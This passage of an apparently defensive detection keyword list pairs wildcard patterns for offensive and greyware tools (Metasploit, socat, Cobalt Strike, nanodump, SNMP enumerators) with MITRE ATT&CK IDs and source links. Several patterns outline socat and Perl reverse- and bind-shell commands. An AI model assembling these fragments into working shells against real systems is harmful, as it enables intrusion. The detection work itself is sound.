- T1057 - T1071.001,TA0009 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/kpcyrd/sniffglue,1,0,N/A,N/A,10,970,89,2022-07-13T22:44:18Z,2017-09-12T16:26:24Z -*snmp_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*snmp-check * -c public*,greyware_tool_keyword,snmpcheck,automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,http://www.nothink.org/codes/snmpcheck/index.php,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*snmpwalk -v1 -cpublic *,greyware_tool_keyword,snmpwalk,allows you to enumerate the SNMP devices and places the output in a very human readable friendly format,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://wiki.debian.org/SNMP,1,0,greyware tool - risks of False positive !,5,10,N/A,N/A,N/A,N/A -*snmpwalk * public *1.3.6.1.*,greyware_tool_keyword,snmpwalk,allows you to enumerate the SNMP devices and places the output in a very human readable friendly format,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://wiki.debian.org/SNMP,1,0,greyware tool - risks of False positive !,5,10,N/A,N/A,N/A,N/A -*snmpwalk -c public -v 1 *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*snmpwalk -c public -v 2c *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*snmpwalk -c public -v1 *,greyware_tool_keyword,snmpwalk,allows you to enumerate the SNMP devices and places the output in a very human readable friendly format,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://wiki.debian.org/SNMP,1,0,greyware tool - risks of False positive !,5,10,N/A,N/A,N/A,N/A -*snmpwn *passwords.txt*,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,0,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*snmpwn.rb* --hosts *,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,0,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*socat *,offensive_tool_keyword,socat,socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file. pipe. device,T1048 - T1055 - T1562,TA0003 - TA0002 - TA0040,N/A,N/A,Data Exfiltration,https://github.com/craSH/socat,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*socat exec:*,greyware_tool_keyword,socat,Shell spawning socat usage ,T1059 - T1105 - T1046,TA0002 - TA0008 - TA0007,N/A,N/A,shell spawning,https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*socat FILE:*tty*raw*echo=0 TCP*:*,greyware_tool_keyword,socat,socat bind shell,T1071 - T1573,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*socat file:*tty*raw*echo=0 tcp-listen:*,greyware_tool_keyword,socat,socat reverse shell,T1071 - T1573,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*socat -O /tmp/*,greyware_tool_keyword,socat,Shell spawning socat usage ,T1059 - T1105 - T1046,TA0002 - TA0008 - TA0007,N/A,N/A,shell spawning,https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*socat TCP4-LISTEN:* fork TCP4:*:*,greyware_tool_keyword,socat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Network Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*socat tcp4-listen:1337*,offensive_tool_keyword,socat,listening on port 1337 -observed in variousmalware and poc explitation tools,T1049 - T1021.001 - T1572,TA0002 - TA0011 - TA0040,N/A,N/A,C2,N/A,1,0,N/A,8,6,N/A,N/A,N/A,N/A -*socat tcp-connect*,greyware_tool_keyword,socat,Shell spawning socat usage ,T1059 - T1105 - T1046,TA0002 - TA0008 - TA0007,N/A,N/A,shell spawning,https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*,greyware_tool_keyword,socat,socat reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*socat tcp-connect:*:* exec:/bin/sh*,greyware_tool_keyword,socat,socat reverse shell,T1071 - T1573,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*socat TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*,greyware_tool_keyword,socat,socat bind shell,T1071 - T1573,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*Social Engineer Toolkit*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. Ohio.,T1566 - T1059.004 - T1564.001,TA0001 - TA0002 - TA0007,N/A,N/A,Phishing,https://github.com/trustedsec/social-engineer-toolkit,1,0,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*social_engineering/web_cloner*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*SocialPwned.git*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*socialpwned.py*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*socialpwned_*.txt*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,1,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*SocketHijacking.*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*socks*127.0.0.1 9050*,offensive_tool_keyword,proxychains,(TOR default) proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*socks5_exe.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*socks5h://127.0.0.1:9050*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,0,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*socky whoami*,offensive_tool_keyword,cobaltstrike,Winsocket for Cobalt Strike.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/WKL-Sec/Winsocky,1,1,N/A,10,10,79,13,2023-07-06T11:47:18Z,2023-06-22T07:00:22Z -*SOFTWARE\WOW6432Node\FreeFileSync*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*Soledge/BlockEtw*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*solo_mine_example.cmd*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*souravbaghz/RadareEye*,offensive_tool_keyword,RadareEye,Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Network Exploitation tools,https://github.com/souravbaghz/RadareEye,1,1,N/A,N/A,4,338,50,2021-12-11T06:16:37Z,2021-01-07T04:52:58Z -*source/avetsvc.c*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*source/byakugan*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/dllinject*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/flash_exploiter*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/javapayload*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/psh_exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/shtinkering.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*Source\wdextract\*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Source\wdextract\zlib\dll_x64\zlibwapi.dll*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Source\wdextract\zlib\dll_x86\zlibwapi.dll*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Source\wdextract\zlib\lib\zlibwapi32.lib*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Source\wdextract\zlib\lib\zlibwapi64.lib*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*SourcePoint*Loader.go*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*source-teamserver.sh*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*spacerunner.exe -i *.ps1* -o *.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*SpaceRunner-master.zip*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,1,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*SpamChannel-main.zip*,offensive_tool_keyword,SpamChannel,poof emails from any of the +2 Million domains using MailChannels,T1566 - T1566.001,TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/byt3bl33d3r/SpamChannel,1,1,N/A,8,3,256,28,2023-09-21T12:25:03Z,2022-12-20T21:31:55Z -*Spartacus.exe --mode proxy*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*Spartacus-main.zip*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,1,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*spartacus-proxy-*.log*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*Spartacus-v2.*-x64.zip*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,1,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*spartan-conseil/ratchatpt*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*spartan-conseil/ratchatpt*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*spawn/runshellcode*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*spawn_cmd.dll*,offensive_tool_keyword,POC,POC to check for CVE-2020-0796 /SMBGhost Expected outcome: cmd.exe launched with system access,T1210.001 - T1213 - T1212 - T1201,TA0007 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ZecOps/CVE-2020-0796-LPE-POC,1,1,N/A,N/A,3,242,90,2020-04-02T08:01:38Z,2020-03-30T16:06:50Z -*spawnas * \ HACKER https*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SpawnAsAgentManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*spawnasshellcode*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 